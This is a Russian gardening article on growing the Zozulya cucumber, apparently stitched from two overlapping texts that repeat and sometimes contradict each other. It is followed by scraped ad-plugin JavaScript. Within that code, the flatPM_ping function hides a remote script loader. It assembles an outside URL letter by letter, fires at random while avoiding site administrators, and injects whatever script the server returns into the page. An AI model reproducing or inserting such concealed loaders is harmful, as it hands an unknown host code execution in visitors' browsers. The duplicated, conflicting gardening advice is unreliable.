Для подкормок культуры прибегают к органическим и минеральным удобрениям. Наиболее эффективно использовать комбинированные составы. Вносить их следует не только под корень, но и по листу. Рекомендуется придерживаться следующей схемы:

  1. Фаза 1-го настоящего листка. Использовать нитрофоску и куриный помет. Сухой помет залить таким же количеством воды, настаивать в плотно закрытой емкости 0,5-1 неделю. Добавить стакан полученного настоя в 10-литровое ведро воды, растворить нитрофоску (1 ст. л.). Под каждый куст внести 2-2,5 л удобрения.
  2. Фаза 2-го настоящего листка. Подготовить раствор: в 10-литровое ведро добавить воду, сульфат калия (1 ч. л.) и настой куриного помета (0,5 л). Вносить под каждый куст по 2-2,5 л, повторить через 2-3 недели.
  3. Начало цветения. В 10 л воды растворить селитру (20 г) либо мочевину (40 г). Полученный раствор используют для опрыскиваний.

Как добиться щедрого урожая?

Зозуля относится к частично партенокарпическим растениям. Урожай без опыления будет, но невысокий. Добиться его повышения можно путем подсаживания опылителя – по 2-3 мужских растений в каждом ряду.

Важным условием для получения щедрого урожая является правильное выращивание растений. Зозуля подходит и для открытого грунта, но максимальные результаты дает в теплицах и парниках.

Для стимуляции урожая важно правильно его собирать. Рекомендуется делать это не реже каждых 3-5 дней. Благодаря такому приему образуется больше новых плодов.

Как получить щедрый урожай огурцов в открытом грунте, а также в теплице – узнайте из видео:

Болезни и их профилактика

Зозуле характерна достаточная устойчивость к болезням, но некоторые проблемы не исключены:

  • Аскохитоз. Возникают водянистые пятна с точками черного цвета на стеблях, черешках листьев. Стебель становится сухим, мочалистым, листья покрываются бурыми пятнами с черными точками. Для профилактики надо регулярно проветривать теплицу, обрабатывать растения фунгицидами, больные экземпляры сжигать.
  • Антракноз. Проявляется округлыми бурыми пятнами на листьях, вдавленными бурыми участками на стебле, горечью и быстрым гниением плодов. Профилактика такая же, как и для аскохитоза.
  • Бактериоз. Выражается в угловатых коричневых пятнах на листьях с последующим образованием дыр. Плоды становятся искривленными, водянистыми, появляются язвы. Для профилактики необходимо тщательное протравливание семян, оптимальная температура и влажность в теплице, бордоская жидкость для опрыскивания (в литре воды растворить известь и медный купорос по 10 г).
  • Ложная мучнистая роса. Выражается желтыми пятнами и фиолетовым налетом на листьях, которые выворачиваются наружу и засыхают. Для профилактики надо протравливать семена, обеспечить должный микроклимат в теплице, использовать фунгициды.
  • Мучнистая роса. Проявляется белым налетом на листьях, постепенно захватывающим их внешние стороны и темнеющим. Плоды становятся некрасивыми, горькими. В качестве профилактики надо протравливать семена, дезинфицировать теплицу, поддерживать в ней стабильный микроклимат, использовать фунгициды для опрыскивания.
  • Тля. Эти черные или зеленоватые насекомые хорошо видны. Они приводят к бугристости листьев и их скручиванию, остановке растений в росте. Необходимо использовать инсектициды: Арриво, Децис.

Сбор урожая и правила хранения

При сборе урожая плоды надо снимать аккуратно, чтобы не повредить растение. Делать это надо, прищипывая хвостики ногтями.

Собранные плоды сразу помещают в ящики, которые надо хранить в холодильнике или другом прохладном месте. Огурцы могут пролежать в таких условиях до недели. Для лучшей сохранности рекомендуется поместить рядом емкость с водой, но не мочить сами плоды.

Зозулю употребляют в свежем виде. Можно использовать огурцы для маринования, но в засолку они не годятся, так как быстро становятся мягкими.

Зозуля – сорт огурцов, который известен и востребован уже несколько десятилетий. Выращивать лучше в теплице, чтобы его урожай был выше. На урожайность влияют и другие факторы, в частности правильный посев, дальнейший уход и профилактика болезней. Выращивают Зозулю на еду и продажу, предпочитая для консервирования другие сорта.

Сорт огурцов Зозуля

Сорт огурцов Зозуля известен огородникам уже многие годы. Получен на Овощной опытной станции имени В. И. Эдельштейна. Он был внесен в Госреестр России в 1977 году. Его любят за универсальность, неприхотливость, высокое качество зеленцов. Огурец Зозуля пригоден для выращивания в разных регионах России, и странах с подобными климатическими условиями. В этой статье представлено подробное описание гибрида.

Описание сорта Зозуля

Огурец Зозуля относится к скороспелым видам. От появления всходов и до созревания урожая проходит в среднем 40-45 дней. Относится к партенокарпическим гибридам, для выращивания под укрытиями, хотя и в открытом грунте может давать неплохой урожай.

Огурчики растут удлиненно-цилиндрической формы, иногда имеется небольшой изгиб. Длиной зеленцы по 14-24 см и весом в пределах 150-280 г. Шкурка плотная, но съедаемая, не горчит. Окрас огурчиков темно-зеленый, насыщенный, с тонкими полосами светлого оттенка. Бугорчики на шкурке небольшие и их не много. Шипы былого цвета. Мякоть плотная, с высоким содержанием сока. Вкус приятный.

Мякоть плотная, с высоким содержанием сока, вкус приятный

Характеристика огурцов Зозуля F1

Огурец Зозуля славится своими положительными качествами, так что не удивительно, что его часто выбирают огородники для выращивания.

  • Сорт не требует опыления, поэтому его просто выращивать в теплицах, парниках (под укрытием).
  • Есть иммунитет к пятнистостям и вирусу огуречной мозаики.
  • Растения сильные, хорошо растут даже при неблагоприятных условиях.
  • Назначение преимущественно салатное, но и в консервации эти огурчики на вкус хорошие.

Назначение преимущественно салатное, но и в консервации эти огурчики на вкус хорошие

Недостатки гибрида

Главный недостаток этого гибрида в том, что при выращивании в открытом грунте у сорта снижается урожайность. В среднем с квадрата посадок в незащищенной земле, можно собрать 10 кг огурчиков.

Нужно также учитывать, что зеленцы могут расти неправильной формы, искривляться, принимать форму лампочки. В особенности это наблюдается в жаркое лето, когда температура на улице или в теплице слишком высокая.

Горечь появляется лишь в случае, когда нарушен режим полива. Огурцы, которым недостает воды, всегда горчат. Так что если просто вовремя поливать кустики и следить, чтобы земля не пересыхала, проблем со вкусом не будет.

Рассада огурцов Зозуля

Выращивать огурцы Зозуля F1 проще всего рассадным методом. Рассада заготавливается заранее. В промежутке между 20 апреля и 1 мая сеют семена. Грунт для посева делается из 5 частей торфа, 3 частей перегноя и 2 частей дерна. После смешивания в ящике для рассады, посадочный грунт нужно обработать слабым раствором марганцовки.

Семена необходимо заранее замочить на 30-60 минут в чистой, простой воде. Все, что всплывут – убирают, так как они пустые. После этого, можно семена сеять в лунки или в борозды, сделанные карандашом. Сеют их на расстоянии 5-6 см друг от друга, чтобы могли свободно развиваться.

Выращивать огурцы Зозуля F1 проще всего рассадным методом

Первые ростки появляются при температуре +25…+28 градусов, но после появления ростков, ее понижают до +21 градуса, чтобы ростки не вытягивались. Ухаживают за рассадой постоянно. Нужно время от времени проводить поливы, подкормки слабыми растворами удобрений и рыхление почвы. Когда у саженцев появится 3-4 листика (через 3 недели после посева в среднем), можно будет пересаживать их на постоянное место.

Особенности посадки Зозули

Чтобы огурчики хорошо уродили, необходимо сажать их в хороший грунт. Участок подбирается солнечный, равнинный, чтобы свет равномерно распределялся по рядкам. Лучшие предшественники – лук, чеснок, картофель или сидераты. Земля должна быть легкой, плодородной, с нейтральной кислотностью.

Время посадки зависит от климата, места, где будут выращиваться огурчики. Чаще всего это делают в мае. Но желательно делать это после того, как грунт прогреется до +20 градусов.

Чтобы огурчики хорошо уродили, необходимо сажать их в хороший грунт

Рассаду пересаживают в хорошо удобренный, рыхлый грунт. В нем необходимо сделать лунки на расстоянии 35-50 см друг от друга, глубиной около 15 см. Чтобы ростки быстрее прижились, можно в каждую ямку добавить по горсточке перегноя, 0,5 ч. л. суперфосфата и столько же калийной соли, а затем обильно полить. Когда вода впитается, можно будет провести и саму посадку. Саженцы аккуратно вынимаются их старого контейнера и опускаются в лунки. Присыпают их землей аккуратно, чтобы не заглублялась точка роста.

Если рассада слабая, в каждую лунку сажается сразу по 3 ростка. Когда они подрастут, можно будет выбрать самый сильный, а остальные рассадить или просто удалить.

Правила ухода за огурцами Зозуля F1

После проведения посадки, необходимо обеспечить саженцам полноценный уход. Делать это не трудно, так как сорт неприхотлив.

    Полив нужно проводить регулярно, чтобы земля не пересыхала. Если воды огурцам будет мало, появится горечь в шкурке и в мякоти! На молодое растение за раз должно расходоваться не меньше 500 мл воды, а на взрослое – 1 литр. Вода нужна теплая, в идеале – дождевая.

Полив нужно проводить регулярно, чтобы земля не пересыхала

  • Рыхление грунта необходимо после каждого полива. Если земля возьмется коркой, к корням перестанет поступать кислород в достаточном количестве, и развитие замедлится.
  • Благодаря ограниченному боковому ветвлению, огурцы Зозуля, как правило, не прищипывают.
  • Сорняки, что появляются в междурядьях и под кустиками огурчиков, нужно постоянно вырывать. Это станет хорошей профилактикой болезней, вредителей и, кроме того, во время этой процедуры вспушивается грунт, так что потребуется меньше прополок!
  • Растения хорошо отзываются на внесение удобрений. Использовать для этого можно органику, минералы или органо-минеральные (ОМУ) препараты. Вносят удобрения под корень или распыляют по листу (в зависимости от вида). Первая подкормка нужна во время появления 1 листика (настой куриного помета, нитрофоска). Второй раз удобрения вносят после появления 2 листика (сульфат калия, куриный помет). Третий раз подкормка делается такой же, как во 2 раз, через 2-3 недели. Ну и в начале цветения также стоит использовать удобрения (аммиачная селитра или мочевина).

Зозуля F1 хорошо отзываются на внесение удобрений

Плодоносить огурцы Зозуля могут и без опыления. Но урожайность при этом будет на среднем уровне. Если же дополнительно опылить растения вручную или запустить в теплицу пчел, завязей будет намного больше.

Болезни и вредители огурцов

Огурец Зозуля устойчив к большинству заболеваний, но полностью нельзя избежать недугов.

  • Аскохитоз проявляется в водянистых пятнах с точками черного цвета на черешках листьев и стеблях. Как следствие стебель сохнет, на листьях появляются бурые пятна с черными точками. Чтобы не допустить болезнь, теплицу нужно регулярно проветривать. Если же недуг замечен на растении, его сразу вырывают и сжигают.
  • Антракноз проявляется в бурых пятнах на листочках и бурыми вмятинами на стебле. Плоды начинают быстро гнить, отдают горечью. Профилактика та же, что и в предыдущем случае. Если болезнь появилась, все больные растения удаляют с участка.
  • Бактериоз проявляется в коричневых пятнышках на листочках, со временем на их месте появляются дырочки. Плоды растут кривыми, водянистыми, с язвами. Для лечения и профилактики используется бордосская жидкость по инструкции. Также важно своевременно проветривать теплицу, поддерживать там нормальную влажность, температуру.

Вредители поражают этот гибрид не часто. Но даже если такое случается, при своевременном лечении большого вреда они растению не причинят. Чаще всего на пагонах селится тля. Ее легко заметить, если присмотреться к верхушкам молодых побегов и тыльной стороне молодых листиков. Чтобы вывести вредителя, можно использовать инсектициды «Арриво», «Танрек», «Фитоверм», «Актофит», «Актара».

Сбор и обработка урожая

Огурцы созревают постепенно. Собирать их лучше всего каждые 3-5 дней, чтобы долго на плетях не висели. К тому же своевременная уборка урожая провоцирует завязывание новых плодов. Первые зеленцы созревают уже в июне или начале июля, при своевременной посадке.

Огурцы Зозуля F1 чаще всего применяют для приготовления салатов и свежих закусок

Употребляют зеленцы в свежем виде. Их можно применять для приготовления салатов, свежих закусок. А можно ли солить или консервировать огурцы Зозуля? Как правило, подобного рода огурчики для засолки не используют. Но многие хозяйки отмечают, что и огурец Зозуля подходит для консервирования. Если зеленцы заранее вымочить в воде и выбрать хороший рецепт маринада, они получатся вкусными и хрустящими.

Отзывы огородников о сорте огурцов Зозуля

Мнения огородников, что уже пробовали выращивать огурцы Зозуля на своих участках, представлены ниже.

  • Антонина Душа: «Слышала много лестных отзывов об огурцах Зозуля, поэтому решила посадить на своем участке. Сажала в открытый грунт, за домом, где много солнышка. Огурчики выросли нормального размера, но некоторые горчили. Скорее всего, им было очень жарко, так как лето знойное выдалось. В принципе сорт неплохой, но я больше сажать не буду, так как жара летом в моем регионе не редкость!».
  • Сергей Метелкин: «Люблю огурец Зозуля за приятный вкус и высокую урожайность. Выращиваю только в теплице, потому что в открытом грунте они дают меньше плодов. В принципе с ростом у них проблем нет, завязей всегда много, нужно только следить за тем, чтобы температура была умеренной (не жара) и чтобы грунт не пересыхал. Если обеспечить огурчикам этого сорта хороший уход и нормальные условия для развития, они дадут столько урожая, что и на еду и на консервацию хватит!».
  • София Селедочкина: «Уже по одному виду огурцов Зозуля, можно понять, что они для салатов. И все же в прошлом году я их попробовала законсервировать, потому что не было никаких других – плохо уродили засолочные сорта. Как не удивительно, в баночках эти огурчики получаются неплохими. Конечно, не хрустят, как положено засолочным, и не так хорошо впитывают пряный маринад, но тоже неплохо – для разнообразия. А вот солить их крайне не рекомендую. Вкус у них получается пресный, а мякоть размягчается».
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};